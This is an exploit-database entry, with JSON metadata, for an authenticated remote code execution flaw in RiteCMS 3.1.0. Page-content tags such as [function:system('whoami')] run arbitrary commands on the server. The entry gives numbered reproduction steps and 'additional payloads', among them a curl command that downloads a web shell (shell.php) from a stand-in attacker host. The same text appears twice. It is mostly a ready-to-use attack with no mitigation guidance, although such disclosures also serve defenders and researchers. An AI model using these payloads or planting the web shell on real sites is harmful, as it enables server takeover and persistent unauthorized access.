📄 RiteCMS 3.1.0 Remote Code Execution_PACKETSTORM:210932

Description

RiteCMS...................................................

Basic Information

ID PACKETSTORM:210932

Published Oct 27, 2025 at 00:00

Affected Product

Affected Versions # Exploit Title: RiteCMS 3.1.0 - Authenticated Remote Code Execution (RCE)
# Date: 2025-10-26
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/handylulu/RiteCMS
# Software Link:
https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: 3.1.0
# Tested on: Windows XP

## Vulnerability Description
RiteCMS v3.1.0 contains an authenticated Remote Code Execution (RCE) via
its content_function() handler: [function:...] tags in page content are
evaluated, allowing a user with page-editing privileges to execute
arbitrary PHP on the server.

## Exploit Code
Create or edit any page with the following content:

[function:system('whoami')]

## Steps to Reproduce
1. Login as administrator
2. Create new page or edit existing page
3. Insert [function:system('whoami')] in content
4. Save and view page
5. Command output will be displayed

## additional payloads
[function:system('curl http://attacker/shell.php -o shell.php')]
[function:system('id')]

{
    "lastseen": "2025-10-27T18:01:39",
    "description": "RiteCMS...................................................",
    "published": "2025-10-27T00:00:00",
    "modified": "2025-10-27T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 RiteCMS 3.1.0 Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:210932",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "# Exploit Title: RiteCMS 3.1.0 - Authenticated Remote Code Execution (RCE)\n    # Date: 2025-10-26\n    # Exploit Author: Chokri Hammedi\n    # Vendor Homepage: https://github.com/handylulu/RiteCMS\n    # Software Link:\n    https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip\n    # Version: 3.1.0\n    # Tested on: Windows XP\n    \n    \n    ## Vulnerability Description\n    RiteCMS v3.1.0 contains an authenticated Remote Code Execution (RCE) via\n    its content_function() handler: [function:...] tags in page content are\n    evaluated, allowing a user with page-editing privileges to execute\n    arbitrary PHP on the server.\n    \n    ## Exploit Code\n    Create or edit any page with the following content:\n    \n    [function:system('whoami')]\n    \n    \n    ## Steps to Reproduce\n    1. Login as administrator\n    2. Create new page or edit existing page\n    3. Insert [function:system('whoami')] in content\n    4. Save and view page\n    5. Command output will be displayed\n    \n    ## additional payloads\n    [function:system('curl http://attacker/shell.php -o shell.php')]\n    [function:system('id')]",
    "sourceHref": "https://packetstorm.news/download/210932",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/210932/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply